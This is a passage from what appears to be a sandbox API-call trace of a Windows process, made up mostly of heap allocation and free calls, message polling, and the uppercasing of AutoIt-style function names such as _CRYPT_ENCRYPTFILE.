hHeap=0x770000, dwFlags=0x0, lpMem=0x888d10 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f50 | out: hHeap=0x770000) returned 1 [0026.280] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x879168 [0026.280] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x888d10 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d10 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d28 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef38 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef28 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d28 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x879190 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x884f60 | out: hHeap=0x770000) returned 1 [0026.280] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d28 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d40 | out: hHeap=0x770000) returned 1 [0026.280] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef28 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d40 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d58 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef38 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d58 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d70 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef48 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888d88 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888da0 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef58 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888da0 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888db8 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef68 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88de80 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef68 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88de80 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef68 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] CharUpperBuffW (in: lpsz="_SENDMESSAGE", cchLength=0xc | out: lpsz="_SENDMESSAGE") returned 0xc [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7affa0 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef68 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.281] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88de80 | out: hHeap=0x770000) returned 1 [0026.281] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef68 | out: hHeap=0x770000) returned 1 [0026.281] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888db8 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888dd0 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef78 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888dd0 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888de8 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef88 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888de8 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e00 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aef98 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e00 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e18 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aefa8 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e18 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e30 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aefb8 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e30 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e48 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aefc8 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e48 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e60 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aefd8 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e60 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e78 | out: hHeap=0x770000) returned 1 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aefe8 | out: hHeap=0x770000) returned 1 [0026.282] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.282] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e78 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e90 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7aeff8 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888e90 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ea8 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af008 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ea8 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ec0 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af018 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ec0 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ed8 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af028 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ed8 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ef0 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af038 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ef0 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f08 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af048 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f08 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f20 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af058 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f20 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f38 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af068 | out: hHeap=0x770000) returned 1 [0026.283] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f38 | out: hHeap=0x770000) returned 1 [0026.283] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f50 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af078 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f50 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f68 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af088 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f68 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f80 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af098 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f80 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888f98 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af0a8 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888fc8 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af0b8 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888fc8 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888fe0 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af0c8 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888fe0 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ff8 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af0d8 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x888ff8 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889010 | out: hHeap=0x770000) returned 1 [0026.284] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af0e8 | out: hHeap=0x770000) returned 1 [0026.284] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.284] RtlSizeHeap (HeapHandle=0x770000, Flags=0x0, MemoryPointer=0x795158) returned 0x80 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889040 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af108 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889058 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b06d0 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTFILE") returned 0x12 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_DECRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_DECRYPTDATA") returned 0x12 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88df28 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.285] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.285] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab1d0 | out: hHeap=0x770000) returned 1 [0026.285] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af118 | out: hHeap=0x770000) returned 1 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0026.286] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b06d0 | out: hHeap=0x770000) returned 1 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0026.286] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0026.286] CharUpperBuffW (in: lpsz="_SINGLETON", cchLength=0xa | out: lpsz="_SINGLETON") returned 0xa [0026.286] PeekMessageW (in: lpMsg=0x6af2ac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 